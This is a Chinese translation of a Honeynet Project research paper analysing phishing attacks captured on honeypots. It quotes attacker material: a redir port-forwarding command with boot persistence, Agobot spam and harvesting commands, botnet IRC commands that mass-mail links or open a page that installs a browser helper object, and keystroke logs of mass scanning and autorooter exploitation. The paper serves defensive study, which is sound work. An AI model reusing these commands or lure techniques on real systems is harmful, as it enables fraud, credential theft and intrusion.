網絡釣魚是通過大量發送聲稱來自于銀行或其他知名機構的欺騙性垃圾郵件，意圖引誘收信人給出敏感信息（如用戶名、口令、帳號 ID 、 ATM PIN 碼或信用卡詳細信息）的一種攻擊方式。最典型的網絡釣魚攻擊將收信人引誘到一個通過精心設計與目標組織的網站非常相似的釣魚網站上，并獲取收信人在此網站上輸入的個人敏感信息，通常這個攻擊過程不會讓受害者警覺。這些個人信息對黑客們具有非常大的吸引力，因為這些信息使得他們可以假冒受害者進行欺詐性金融交易，從而獲得經濟利益。受害者經常遭受顯著的經濟損失或全部個人信息被竊取并用于犯罪的目的。這篇“了解你的敵人”文章旨在基于 德國蜜網項目組 和英國蜜網項目組所搜集到的攻擊數據給出網絡釣魚攻擊的一些實際案例分析。這篇文章關注于由蜜網項目組在實際環境中發現的真實存在的網絡釣魚攻擊案例，但不會覆蓋所有可能存在的網絡釣魚攻擊方法和技術。攻擊者也在不斷地進行技術創新和發展，目前也應該有（本文未提及的）新的網絡釣魚技術已經在開發中，甚至使用中。

在給出一個簡要的引言和背景介紹后，我們將回顧釣魚者實際使用的技術和工具，給出使用蜜網技術捕獲真實世界中的網絡釣魚攻擊的三個實驗型研究的案例。這些攻擊案例將詳細地進行描述，包括系統入侵、釣魚網站架設、消息傳播和數據收集等階段。隨后，將對其中普遍應用的技術及網絡釣魚、垃圾郵件和僵尸網絡等技術進行融合的趨勢給出分析。釣魚者使用惡意軟件進行自動化地 Email 地址收集和垃圾郵件發送的案例也將被回顧，同時我們也將展示我們在網絡掃描技術及被攻陷主機如何被用于傳播釣魚郵件和其他垃圾郵件上的發現。最后，我們對本文給出結論，包括我們在最近 6 個月內獲得的經驗，以及我們建議的進一步研究的客體。

這篇文章包括了豐富的支持性信息，提供了包含特定的網絡釣魚攻擊案例更詳細數據的鏈接。最后聲明一下，在研究過程中，我們沒有收集任何機密性的個人數據。在一些案例中，我們與被涉及網絡釣魚攻擊的組織進行了直接聯系，或者將這些攻擊相關的數據轉交給當地的應急響應組織。

引言

欺騙別人給出口令或其他敏感信息的方法在黑客界已經有一個悠久的歷史。傳統上，這種行為一般以社交工程的方式進行。在二十世紀九十年代，隨著互聯網所連接的主機系統和用戶量的飛速增長，攻擊者開始將這個過程自動化，從而攻擊數量巨大的互聯網用戶群體。最早系統性地對這種攻擊行為進行的研究工作在 1998 年由 Gordon 和 Chess 發表。（ Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet , presented at the Virus Bulletin Conference in Munich, Germany, October 1998 ） Gordon 和 Chess 研究針對 AOL （美國在線）的惡意軟件，但實際上他們面對的是網絡釣魚的企圖而不是他們所期望的特洛伊木馬攻擊。網絡釣魚 (Phishing) 這個詞 (password harvesting fishing) 描述了通過欺騙手段獲取敏感個人信息如口令、信用卡詳細信息等的攻擊方式，而欺騙手段一般是假冒成確實需要這些信息的可信方。 Gordon 和 Chess 描述的一個釣魚信件如下所示：

Sector 4G 9E of our data base has lost all I/O functions. When your account
logged onto our system, we were temporarily able to verify it as a
registered user. Approximately 94 seconds ago, your verification was made
void by loss of data in the Sector 4G 9E. Now, due to AOL verification
protocol, it is mandatory for us to re-verify you. Please click 'Respond' and
re-state your password. Failure to comply will result in immediate account
deletion.

早期的網絡釣魚攻擊主要目的是獲得受害者的 AOL 賬號的訪問權，偶爾也期望獲取信用卡數據以用于欺詐目的 ( 如非法買賣這些信息 ) 。這些釣魚的信件通常包含一個簡單的詭計從而哄騙一些“菜鳥”用戶，這些欺騙手段很大程度依賴于受害者對“自動化的”系統功能或權威機構的（表面）輪廓的先天性信任，前面的例子中給出一個硬件設備故障或數據庫毀壞的情節，大部分的普通用戶將會重視任何看起來正式的、或看起來向是為他們提供幫助的緊急的技術上的要求，用戶通常會被催促盡快輸入其敏感信息從而避免嚴重后果，如“ … 重新輸入你的口令，如未及時輸入則將導致直接刪除賬號”。為了避免可能潛在的嚴重的后果，受害者通常立即照做，從而不知不覺地將這些使用此社交工程手段的黑客所需要的敏感數據提供給了他們。事后的證據表明這些黑客都是單獨行動，或是以一個小而簡單的組織形式活動。一些文獻也描述了早期的網絡釣魚者大多是一些期望獲得更多賬號數據去惡作劇及打長途電話的青少年，通常沒有很強的組織性和蓄意性。

現在，釣魚者所首選的策略是通過大量散發誘騙郵件，冒充成一個可信的組織機構（通常是那些釣魚者所期望的已經被受害者所信任的機構），去引誘盡可能多的終端用戶。釣魚者會發出一個讓用戶采取緊急動作的請求，而具有諷刺意義的是通常其理由是保護用戶的機密性數據免受惡意活動的侵害，這封欺騙性的電子郵件將會包含一個容易混淆的鏈接，指向一個假冒目標機構公開網站的遠程網頁。釣魚者希望受害者能夠被欺騙，從而向這個假的、但看起來是目標機構的“官方”網站的網頁接口輸入他們的機密信息。被釣魚者所青睞的目標機構包括很多著名的銀行，信用卡公司和涉及日常性支付行為的知名互聯網商務網站（如 eBay 和 Paypal 等 ）。大量針對互聯網用戶的釣魚郵件的實例可以在反網絡釣魚工作組 （ Anti-Phishing Working Group ）的網站上 的 釣魚郵件歸檔 中 可以獲得，其中許多郵件都顯示了釣魚者可以欺騙無知的用戶相信他們正在訪問一個合法的網頁接口的極高精確性。

在這個簡要介紹網絡釣魚概念的引言之后，我們將開始回顧在我們觀察到的真實網絡釣魚攻擊中所實際使用的技術和工具。如果你對網絡釣魚的更深入的背景知識感興趣，我們為你準備了 具體的背景信息 這個頁面。#p#副標題#e#

工具和策略

網絡釣魚攻擊一般僅利用一些簡單的工具和技術來欺騙無戒備心的用戶。支撐一次網絡釣魚攻擊的底層基礎設施可以是最基本的簡單地拷貝一個 HTML 頁面，上傳到一個剛剛攻陷的網站服務器，以及一個服務器端的用來處理用戶輸入數據的腳本，也可能涉及更為復雜的網站及內容重定向，但他們的底層目標是一致的——架設一個假冒可信機構的網站，并部署一些必需的后臺腳本處理用戶的輸入數據并讓攻擊者獲取。使用最新的 HTML 編輯工具可以非常容易地構建出模仿目標組織機構的網站，同時如果攻擊者不介意掃描互聯網 IP 地址空間以尋找潛在的有漏洞的主機，缺乏有效的安全防護的網站服務器也能夠非常容易地找到并被攻陷。一旦被攻陷，即使是家庭用的 PC 主機都可以作為釣魚網站的宿主主機，所以釣魚者的攻擊目標不僅僅是知名的企業和學院里的系統。攻擊者經常不分青紅皂白地去選擇他們的目標主機，而僅僅是在一個大的 IP 地址空間中隨機地掃描，尋找可被利用的特定的安全漏洞。

一旦釣魚者建立起一個模仿可信機構的真實且能夠讓人信以為真的假冒網站后，對他們的重要挑戰是如何將用戶從一個合法的網站轉移到訪問他們所架設的假冒網站。除非釣魚者有能力去改變目標網站的 DNS 解析（稱為 DNS 中毒攻擊 ）或采取其他方式對網絡流量進行重定向（稱為 pharming 的一種技術），他們必須依賴某種形式的內容上的欺騙技巧，去引誘不幸的用戶去訪問假冒的網站。欺騙技巧的質量越高，他們所撒的漁網就越寬，一個無知的用戶錯誤地訪問這個假冒網站（并提供給釣魚者他的機密信息和私人數據）的機會就越大。

對攻擊者不幸的是，當他們假冒一個組織結構（如一個銀行或可信的商務網站），釣魚者通常沒有任何互聯網上哪些用戶屬于他們的客戶此類信息，也就不知道哪些用戶最容易上鉤。即使釣魚者可以將指向假冒網站的鏈接發布到與目標機構相關的一些聊天室或論壇上（如一個技術支持網站或網絡社區談論組），目標機構很可能比較迅速地被通知并做出反應，這個鏈接也會在很多受害者訪問它所指向的內容并提交他們的個人信息前被清除。同時對釣魚者也存在一個顯著的風險，目標機構或法律執行部門可能會追蹤并關閉這些假冒的網站。因此，釣魚者需要一個方法，能夠在盡量減少他們所承擔的風險的同時，在短時間內欺騙盡可能多的潛在受害群體，他們找到了理想的犯罪搭檔——垃圾郵件。

垃圾郵件發送者擁有包括幾百萬使用中電子郵件地址的數據庫，因此最新的垃圾郵件群發技術可以用來幫助一個釣魚者低風險廣泛地發布他們的誘騙郵件。垃圾郵件通常通過一些被攻陷的架設在境外主機上的郵件服務器，或是通過一個全球的傀儡主機網絡 ( botnets ) 進行發送，因此郵件發送者被追蹤的可能性將會很小。如果一個無戒備心的用戶收到一封看起來像是由他們的銀行所發來的，帶有銀行正式標志的電子郵件，要求他們訪問一個看起來與銀行官方網站一摸一樣的網站并由于安全理由更改他們在線的銀行口令，這比起那些介紹新奇產品并鏈接到未知網站的普通垃圾郵件來更可能使得用戶上當。為了增加用戶相信這個郵件是真實的可能性，釣魚者會應用一些另外的技術來進一步提高他們所進行的誘捕手段的質量：

在指向假冒網站的鏈接中使用 IP 地址代替域名。一些無戒備心的用戶將不會檢查（或不知道如何檢查）這個 IP 地址是否來自假冒網站頁面上所聲稱的目標機構。

注冊發音相近或形似的 DNS 域名（如 b1gbank.com 或 bigbnk.com 假冒 bigbank.com ），并在上面架設假冒網站，期望用戶不會發現他們之間的差異。

在一個假冒釣魚網站的電子郵件 HTML 內容中嵌入一些指向真實的目標網站的鏈接，從而使得用戶的網站瀏覽器的大多數 HTTP 連接是指向真實的目標網站，而僅有少數的關鍵連接（如提交敏感信息的頁面）指向假冒的網站。如果用戶的電子郵件客戶端軟件支持 HTML 內容的自動獲取，那會在電子郵件被讀取的時候自動地連接假冒網站，手動地瀏覽也不會在大量與真實網站的正常網絡活動中注意到少量與惡意服務器的連接。

對假冒網站的 URL 進行編碼和混淆，很多用戶不會注意到或者理解 URL 鏈接被做過什么處理，并會假設它是良性的。 IDN 欺騙技術（ IDN spoofing ）就是這樣的一種技術，它使用 Unicode 編碼的 URL 在瀏覽器的地址欄里呈現的看起來像是真實的網站地址，但實際上卻指向一個完全不同的地址。

企圖攻擊用戶網頁瀏覽器存在的漏洞，使之隱藏消息內容的實質。微軟的 IE 和 Outlook 都被發現過存在可以被這種技術攻擊的漏洞（如 地址欄假冒 和 IFrame element 漏洞 ）。

將假冒的釣魚網站配置成記錄用戶提交的所有數據并進行不可察覺的日志，然后將用戶重定向到真實的網站。這將導致一個“口令錯誤，請重試”錯誤，或甚至完全透明，但在每種情況下，大部分用戶都不會發覺，更相信是自己的錯誤輸入，而不會想到是由于惡意第三方的干涉。

架設一個假冒網站，作為目標機構真實網站的代理，并偷摸地記錄未使用 SSL 加密保護的口令信息（或甚至為假冒的域名注冊一個有效的 SSL 證書從而對 SSL 加密保護的口令信息進行記錄）。

首先通過惡意軟件在受害者的 PC 上首先安裝一個惡意的瀏覽器助手工具（ Browser Helper Object ），然后由其將受害者重定向到假冒的釣魚網站。 BHO 是一些設計用于定制和控制 IE 瀏覽器的 DLL ，如果成功，受害者將會被欺騙，相信他們正在訪問合法的網站內容，然而實際上卻在訪問一個假冒的釣魚網站。

使用惡意軟件去修改受害者 PC 上的用來維護本地 DNS 域名和 IP 地址映射的 hosts 文件，這將使得他們的網頁瀏覽器在連接架設假冒釣魚網站的服務器時，卻讓用戶看起來像是訪問目標機構的合法網站。

由于很多電子商務或在線銀行應用的復雜性，他們的網站經常使用 HTML 框架結構或其他復雜的頁面結構架設，這也可能使得一個終端用戶很難判斷一個特定的網頁是否合法。上述列舉的這些技術的組合使用可以隱藏一個精心設計的網頁的真實來源，也使得一個無戒備心的用戶很可能被引誘去訪問釣魚者的假冒網站，不知不覺地泄漏他們的認證口令信息和所需要的數字身份信息，從而成為一次成功的網絡釣魚攻擊的又一個受害者。#p#副標題#e#

互聯網用戶也經常在他們自己收到欺騙性郵件發覺網絡釣魚攻擊，也常常在釣魚網站所臨時架設的主機被 關閉很長時間后在技術新聞站點上看到這些惡意網站的記錄副本，但這些事件只能被孤立從受害者的角度去觀察。蜜網技術能夠提供的一個最大的優勢在于其能夠從攻擊者角度捕獲全部行為的能力，使得安全分析員能夠對網絡釣魚攻擊的整個生命周期建立起一個完整的理解，來自蜜網研究聯盟的成員們非常幸運地捕獲了豐富的網絡釣魚攻擊數據集，能夠幫助他們了解真實的一次網絡釣魚攻擊的全過程，從最初主機被攻陷、釣魚網站的架設、群發垃圾郵件、到最后的受害者數據捕獲。三個反映典型的真實世界網絡釣魚攻擊技術的實際案例將在下面被展示和分析。

第一種網絡釣魚技術－通過攻陷的網站服務器釣魚

大部分我們觀察到真實世界中的網絡釣魚攻擊涉及到攻擊者攻入有漏洞的服務器，并安裝惡意的網頁內容。蜜網技術使得我們可以捕獲一次網絡釣魚攻擊的生命周期中的詳細數據，在我們觀察到的這些攻擊事件中，普遍地存在如下一些事件：

攻擊者掃描網段，尋找有漏洞的服務器

服務器被攻陷，并安裝一個 rootkit 或口令保護的后門工具

釣魚者從加密的后門工具獲得對服務器的訪問權

如果這個被攻陷的服務器是一個網站服務器，則下載已構建完畢的釣魚網站內容

進行有限的一些內容配置和網站測試工作（這也潛在地預示著第一次訪問釣魚網站的 IP 地址可能是釣魚者的真實 IP 地址）

群發電子郵件工具被下載，并用以大規模散發包含假冒釣魚網站信息的欺騙性垃圾郵件

網頁瀏覽的流量開始到達釣魚網站，潛在的受害者開始訪問惡意的網頁內容

通常情況下，網站釣魚攻擊的生命周期從釣魚網站發布到互聯網上后只有幾個小時或幾天的時間，我們的研究也發現網絡釣魚攻擊在多臺服務器上針對多個組織機構在同時并行進行。我們將使用兩個典型的網絡釣魚攻擊的實際案例所捕獲的數據來進行闡述這些原理，其中一個案例是由德國蜜網項目組觀察到，另一個由英國蜜網項目組觀察到。在每個案例中，蜜網研究聯盟的成員們都部署了有漏洞的 Linux 蜜罐，對這兩個蜜罐的攻陷過程顯示了相同的攻擊模式：蜜罐的被掃描和被攻陷具有非常強的連續性，并包括預先創建的釣魚網站和群發垃圾郵件工具的上傳和使用。與我們觀察到的幾次其他的案例中類似， Rootkit 和 IRC 服務器也同時在攻擊過程中被安裝，被攻陷的蜜罐同時被用以除網絡釣魚外的其他目的：如作為一個由羅馬尼亞攻擊者控制的 IRC 傀儡主機，同時也作為一個網絡掃描器用以發現和攻擊更多潛在的計算機（盡管蜜網體系框架阻止攻擊者從被攻陷的蜜罐成功的攻擊其他的服務器）。一些令人關注的差異也是非常顯然的，不僅僅是在英國蜜網項目組觀察到的案例中，也就是多個不同的組織幾乎同時訪問了被攻陷的主機，使得取證分析更加復雜。由于篇幅的限制，我們沒有在本文中給出這些攻擊的具體細節，而僅僅給出了我們所得到的經驗以及釣魚者如何進行網絡釣魚攻擊。如果你對這些特定的攻擊過程的更多具體細節感興趣，你可以訪問以下頁面中的信息。

從對在這些案例中由攻擊者下載的釣魚網站內容的分析中可以明顯的看出，釣魚者在同時以多個知名的在線組織結構為假冒目標。預先精心構造、有官方標志的假冒釣魚網站被例行性地部署到被攻陷的主機上－經常通過以不同的網頁服務器根目錄進行分離的“子站點”來同時架設多個組織結構的釣魚網站，同時安裝將垃圾郵件傳播給潛在的受害者的必需工具。在英國蜜網項目組觀察到的案例中，從 FTP 會話所列出的目錄列表中可以確認這些攻擊者已經很深的卷入垃圾郵件和網絡釣魚攻擊中，預先構建的網站內容和郵件傳播攻擊被集中存放在一個集中的服務器上，并且看起來攻擊的目標至少針對 eBay 、 AOL 和其他幾個知名的美國銀行。這些個別的網絡釣魚攻擊看起來并不是隔離的單獨的攻擊事件，因為在這些案例中發布的垃圾郵件通常將受害者指向到幾個同時存在的假冒網站服務器，同時這些垃圾郵件也同時是從多個系統中發出。從英國案例中蜜罐被攻擊后第一個連入對釣魚網站內容的 HTTP 請求也預示著并行的網絡釣魚攻擊操作在進行。

這個連入蜜罐的 HTTP 連接在攻擊者在這臺蜜罐主機上架設假冒的在線銀行網站之前就已經發生，這確認了攻擊者已經預先知道這臺服務器可以被用來作為一個釣魚網站的假設。在攻擊者在架設這個釣魚網站的同時，引誘受害者訪問這個新釣魚網站的垃圾郵件已經從另外一臺主機上發出。

我們對連入被攻陷的蜜罐請求假冒在線銀行內容的 HTTP 請求連接的源 IP 地址數量和范圍感到震驚。下面的圖給出了在蜜罐從網絡中斷開前從各個 IP 地址訪問釣魚網站的 HTTP 請求的數目（包括每個 IP 單獨計算和全部的 HTTP 請求）。

訪問英國蜜網項目組部署蜜罐上的釣魚網站內容的源 IP 地址的頂層 DNS 域名、國家和主機操作系統的列表見 此頁面。要注意的是，在蜜罐被離線進行取證分析之前，盡管訪問釣魚網站的網頁流量到達英國蜜網項目組部署的蜜罐，但并沒有針對處理用戶數據處理的 PHP 腳本的 HTTP POST 請求，因此在此次網絡釣魚攻擊中，沒有任何用戶的信息被釣魚者和我們獲得。在本文提及的所有案例中，我們或是直接通報了目標機構關于攻擊案例和任何相關的他們所需的相關數據，或是向當地的計算機應急響應組通報了所有相關的惡意行為。在所有案例中，沒有任何受害者的私人信息被蜜網項目組和蜜網研究聯盟的成員所捕獲。

從這兩個案例中的數據表明釣魚者是非常活躍并且具有組織性的，在多個被攻陷的主機中快速地移動，并且同時以多個著名的組織結構為目標。同時數據也顯示許多電子郵件用戶被引誘訪問假冒組織機構（如在線銀行和商務網站）的釣魚網站，網絡釣魚攻擊已經給廣大的互聯網用戶帶來了安全風險。 
第二種網絡釣魚技術－通過端口重定向釣魚 
在 2004 年 11 越，德國蜜網項目組部署了包含一個 Redhat Linux 7.3 蜜罐的經典 第二代蜜網。雖然安裝的是相當舊的操作系統版本，攻擊者也能夠非常容易就能攻破，但它令人驚訝地經過了兩個半月后才被首次成功攻陷－這和以上提及案例中討論的蜜罐快速被攻陷的情況形成顯著的反差。更多關于此趨勢的信息可以在“了解你的敵人”系列文章中的“ 了解你的敵人：趨勢分析 ”中可以找到。 
在 2005 年 1 月 11 日 ，一個攻擊者成功地攻陷了這臺蜜罐，使用了針對 Redhat Linux 7.3 缺省安裝存在的 OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability 的攻擊腳本。此案例不尋常的是當攻擊者獲得被攻陷主機的訪問權后，他并沒有直接上傳釣魚網站內容。取而代之的是，攻擊者在蜜罐上安裝并配置了一個端口重定向服務。 
這個端口重定向服務被設計成將發往該蜜罐網站服務器的 HTTP 請求以透明的方式重新路由到另外一個遠程的網站服務器，這種方式潛在地使得對釣魚網站內容更難追蹤。攻擊者下載并在蜜罐上安裝了一個稱為 redir 的工具，此工具是一個能夠透明地將連入的 TCP 連接轉發到一個遠程的目標主機的端口 重定向器。在此次案例中，攻擊者配置該工具將所有到蜜罐 TCP 80 端口（ HTTP ）的流量重定向到一個位于 中國 的遠程網站服務器的 TCP 80 端口。有意思的是，攻擊者并沒有在蜜罐上安裝 Rootkit 以隱藏他的存在，這也說明攻擊者并沒有把被攻陷的主機的價值看的很重，同時并不擔心被檢測到。 
攻擊者使用的建立端口重定向的指令如下： 
redir --lport=80 --laddr=<IP address of honeypot> --cport=80 --caddr=221.4.XXX.XXX 
另外，攻擊者修改了 Linux 系統的啟動腳本文件 /etc/rc.d/rc.local 從而保證 redir 端口重定向服務在蜜罐系統重新啟動后也會被重新啟動，提高了他們的端口重定向服務的生存能力。然后他們開始往外發送釣魚垃圾郵件以引誘受害者訪問此蜜罐，一個示例可以在 此 找到。#p#副標題#e#

為了進一步調查攻擊者的活動，德國蜜網項目組的成員們干涉并偷偷摸摸修改了攻擊者在蜜罐上安裝的 redire 工具的配置，使其在 redir 程序內進行日志，使得更容易地觀察到多少人接收到此垃圾郵件信息，并點擊了其中的鏈接透明地訪問重定向后的釣魚網站內容。在將近 36 小時的時間段內， 721 個 IP 地址被 redir 重定向到釣魚網站，我們又一次對這么多用戶被發布的釣魚郵件所引誘訪問釣魚網站內容而感到震驚。對訪問端口重定向器的 IP 地址的分析可以在 這找到（注意這些信息已經被清潔過，以保護訪問釣魚網站的用戶，同時在我們的研究中僅記錄了 IP 地址數據，任何機密性的用戶數據沒有被捕獲）。 
本次攻擊案例的一個概要時間線如下表所示： 
日期 / 時間 
事件 
2004 年 11 月 1 日 
蜜罐受到首次掃描 
2005 年 1 月 11 日 19:13 
蜜罐上的 OpenSSL 服務被攻陷，端口重定向器被安裝， 釣魚垃圾郵件 被發送。 
2005 年 1 月 11 日 20:07 
對釣魚網站內容的 網頁請求 開始到達蜜罐。 
2005 年 1 月 13 日 8:15 
蜜罐被離線進行取證分析。
第三種網絡釣魚技術－通過僵尸網絡進行釣魚 
蜜網項目組最近發布的一篇文章“ 了解你的敵人：跟蹤 僵尸網絡 ”介紹了一種追蹤僵尸網絡的方法。一個僵尸網絡是由可被攻擊者遠程控制的被攻陷主機所構成的網絡。由于他們的巨大數量（可以有成千上萬的主機一起連接），當僵尸網絡被用以分布式拒絕服務攻擊時，可以對互聯網社區構成巨大的威脅。在 2004 年 10 月的一次調查中，電子郵件安全公司 CipherTrust 得出了 70% 監視到的釣魚垃圾郵件是從 5 個活躍的僵尸網絡中的 1 個所發出的，但是我們的觀察顯示有更多的僵尸網絡已經被用來進行發送垃圾郵件。盡管還沒有一個顯著的實際案例分析，在本節中我們還是給出了我們對可被攻擊者以僵尸網絡的方式進行網絡釣魚攻擊的工具和技術的觀察結果。 
案例時間表 
在從 2004 年 9 月到 2005 年 1 月的這段時期中，德國蜜網項目組部署了一系列安裝未打補丁的微軟 Windows 操作系統的蜜罐，以觀察僵尸網絡活動。我們開發了一個自動化部署的過程，使得蜜罐可以被重復性地部署，攻陷及離線分析。在此期間，超過 100 個不同的僵尸網絡被發現，以及上千的文件被獲取用以離線分析。 
分析 
一些在此研究項目中捕獲的僵尸工具提供了在被攻陷主機上遠程啟動一個 SOCKS v4/v5 代理的能力。 SOCKS 為基于 TCP /IP 的網絡應用程序提供了一種通用化的代理機制（ RFC 1928 ），可以被用來代理最普遍的互聯網流量，如 HTTP 和 SMTP 等。如果攻擊者能夠成功地通過僵尸網絡的控制使得各個遠程傀儡主機上都開放 SOCKS 代理服務功能，那么該主機可以被用來發送大量的垃圾郵件，如果僵尸網絡中包含成千上萬的傀儡主機，那么攻擊者可以輕易地發送巨大數量的垃圾郵件，而這些垃圾郵件的發送源頭卻是覆蓋巨大 IP 地址范圍的屬于一些無戒備心用戶的家庭 PC 機。 
不存在集中的控制點，以及其范圍超出了國界使得很難對僵尸網絡的活動進行追蹤和阻斷。這也使得僵尸網絡為垃圾郵件發布者和釣魚者提供了一種低風險的、但高回報的攻擊方法。或許不會令人驚訝，富有傀儡資源的僵尸網絡擁有者已經開始以犯罪為目標，并且目前也已經出現 租借 僵尸網絡的現象。為了賺取租金，僵尸網絡的操作者將會給他的客戶提供一個支持 SOCKS v4 的服務器 IP 地址和端口。已經有報道顯示僵尸網絡被出售給垃圾郵件發布者作為垃圾郵件的轉發服務器。 " Uncovered: Trojans as Spam Robots ". 一些捕獲的僵尸工具也實現了能夠獲取 Email 地址，或者通過傀儡主機發送垃圾郵件的特殊功能。下面的列表顯示了一些在 Agobot （一個被攻擊者非常普遍使用的僵尸工具，其變種也經常在我們的研究過程中被捕獲）中實現的與垃圾郵件 / 釣魚郵件相關的指令： 
harvest.emails – 使得僵尸工具獲得一個 Email 地址列表 
harvest.emailshttp – 使得僵尸工具通過 HTTP 獲得一個 Email 地址列表 
spam .setlist – 下載一個 Email 地址列表 
spam .settemplate – 下載一個 Email 模板 
spam .start – 開始發送垃圾郵件 
spam .stop – 停止發送垃圾郵件 
aol spam .setlist - AOL - 下載一個 Email 地址列表 
aolspam.settemplate - AOL - 下載一個 Email 模板 
aol spam .setuser - AOL – 設置用戶名 
aol spam .setpass - AOL －設置口令 
aol spam .start - "AOL - 開始發送垃圾郵件 
aol spam .stop - "AOL - 停止發送垃圾郵件  #p#副標題#e#

關于這些指令實現的進一步信息，可以在這找到，以僵尸工具源碼的注釋形式給出。在 drone －一個由德國蜜網項目組開發的自定制 IRC 客戶端的幫助下，通過利用我們的蜜網所捕獲的網絡連接數據將 drone 混入僵尸網絡中，我們可以對僵尸網絡如何被用以進行發送垃圾郵件 / 釣魚郵件進行更深入的了解。以下將給出一些觀察到的典型活動案例。 
實例 1 
在一個特定的僵尸網絡中，我們觀察到攻擊者發出了以下指令（注意 URL 都已經被混淆了）： 

<St0n3y> .mm http://www.example.com/email/fetch.php? 4a 005aec5d7dbe3b 01c 75aab2b 1c 9991 http://www.foobar.net/pay.html Joe did_u_send_me_this

.mm (mass emailing) 指令是一個一般化的 spam_start 指令的定制版本。這個指令接收以下 4 個參數： 
一個包含多個 Email 地址文件的 URL 
包含在垃圾郵件中的目標網站地址鏈接－這個網站可能是一個普遍的垃圾網頁，也可能是一個釣魚網站 
發送者的名字 
郵件的主題 
在本次攻擊案例中，每次調用 fetch.php 腳本會返回 30 個不同的 Email 地址。對于每個收信者，將會構造一個 Email 郵件，將宣傳指令中第二個參數給出的鏈接。在這個實例中，第二個參數的鏈接指向了一個企圖在受害者主機上安裝一個惡意 ActiveX 組件的網頁。 
實例 2 
在另一個僵尸網絡中，我們觀察到在受害者 PC 上安裝瀏覽器助手組件的攻擊方式： 
[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s 
.open 指令告訴每個僵尸工具打開所申請的網頁并顯示給受害者，在這個案例中，這個網頁中包含一個瀏覽器助手組件，企圖在受害者主機上安裝自身。從這個 IRC 頻道的名稱可以顯示出，這個僵尸網絡也是用以發送垃圾郵件的。 
實例 3 
在另外一個僵尸網絡上，我們觀察到 spyware 傳播的實例： 
http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...] 
這個鏈接在對捕獲到的惡意軟件的分析中獲得，它將受害者指向了一個提供“免費的廣告傳播軟件”的公司的網頁，這個網站包含了在企圖訪問客戶端上安裝 ActiveX 組件（推測是 adware 或 spyware ）的多個頁面。#p#副標題#e#

普遍的攻擊旋律

在我們對網絡釣魚攻擊的研究過程中發現了一些普遍的攻擊旋律，攻擊者顯然在混合使用一些工具和技術來提高他們成功的機會。我們現在開始分析兩種這樣的技術－批量掃描和組合式攻擊。

批量掃描

通過對一些被攻陷蜜罐的分析表明，系統是自動化的攻擊腳本所攻陷，這些自動化攻擊腳本通常被稱為 autorooters 。在上面描述的兩個案例中，一旦攻擊者攻陷了蜜罐， autorooter 的 toolkits 就被上傳到服務器上，然后攻擊者就開始嘗試掃描一些 IP 地址空間段來尋找其他同樣存在漏洞的服務器（在德國案例中使用的稱為 superwu 的掃描器，而在英國案例中使用了 mole 掃描器）。在英國案例中捕獲的攻擊者鍵擊記錄如下所示，顯示了從被攻陷的蜜罐發起的批量掃描的實例。注意由于蜜網配置，這些往外的惡意流量會被阻斷，從而這些攻擊不會成功。

攻擊者解壓縮掃描器，并嘗試掃描 B 類地址空間段：
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82

擊者嘗試攻擊潛在的有漏洞的服務器：
[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNNs

攻擊者在一段時間后回來查看已經成功攻陷的服務器列表（這個列表是空的，由于蜜網的配置）：
[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers

攻擊者嘗試掃描更多的 B 類地址空間段，并隨后測試對選擇目標進行攻擊：
[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY

在上述最后一個例子中，注意攻擊者嘗試攻陷的幾個主機并不在從這個蜜罐掃描的 IP 地址范圍內，這又一次提供了批量掃描行為的高協同性和并行性。

對英國攻擊者下載的 mole .tgz 文件的進一步調查揭示了在解壓后的 aotorooter toolkit 的根目錄中有一些 text 文件。這些文件包括掃描配置信息和之前掃描“ grabbb2.x and samba 2.2.8 vulnerability ”的掃描結果日志。在這些文件中還包含 42 個針對其他主機的攻擊案例，以及針對多個 B 類地址空間掃描的結果，從而證明了觀察到的攻擊案例是一個更大的更具組織性的針對類似系統的攻擊中的一部分。一個從攻擊者的角度查看的 mole 掃描工具的輸出結果的實例，可以在 這 找到。

最后，一些從攻陷蜜罐上發現的批量掃描工具看起來并沒有廣泛地傳播，這也顯示了這些攻擊者擁有超越基本的腳本小子的一定水平的開發能力和工具制造能力，或者是一個并沒有將他們的工具共享給公開論壇的封閉社團的成員。又一次，這顯示了具有良好組織性的攻擊者的能力。

組合式攻擊

在我們的研究中，我們也發現了釣魚者經常組合三種不同的攻擊技術。正如我們觀察到，并在本文所描述的，一些時候多種方法將提供一些冗余性，并通過一個兩層的網絡拓撲配置保護他們的網絡釣魚攻擊基礎設置。下圖描述了一種可能的網絡釣魚攻擊拓撲結構：

在這個實例中，一個中央的網站服務器架設了物理上的釣魚網站內容，通常包含針對多個目標機構的多個網站（如在 /ebay 目錄下有 一個 eBay 釣魚網站，在 .paypal 目錄下有一個 PayPal 釣魚網站 ）。一些被攻陷的遠程主機在 redir 端口重定向器的幫助下將連入 TCP 80 端口的 HTTP 流量重定向到中央的網站服務器。這種方案從攻擊者的角度看來比一個單一的釣魚網站擁有以下的一些優勢：

如果一臺遠程的 redir 主機被檢測到了，那么受害者將把這個系統離線并重新安裝，但這并不會對釣魚者構成很大的損失，因為主釣魚網站仍然在線，而且其他的 redir 主機仍然可以將 HTTP 流量轉發到中央網站服務器。

